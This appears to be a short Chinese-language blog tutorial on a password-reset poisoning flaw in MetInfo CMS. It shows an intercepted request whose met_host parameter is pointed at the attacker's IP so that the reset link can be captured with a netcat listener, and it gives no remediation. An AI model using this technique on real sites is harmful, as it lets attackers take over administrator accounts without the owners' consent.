您的位置: 首页 > 文章 > 密码重置漏洞利用 密码重置漏洞利用 分类: 文章 • 2025-04-30 19:12:28 密码重置漏洞 密码重置漏洞通常都是重置过程验证不严造成的,我们可以利用这个机制篡改他的密码重置ip地址更改为我们的地址,而后通过“NC”进行监听,获取我们想要的数据 进入监听状态,需要注意的是要注意自己的端口是否冲突,如果冲突需要更改端口号,同时使用burpsuite进行拦截 POST /MetInfo/admin/admin/getpassword.php?met_host=10.10.87.220 HTTP/1.1,met_host填写上自己的ip地址,而后重新发包即可使用"CN"拦截到密码重置链接 点击此链接即可重置密码
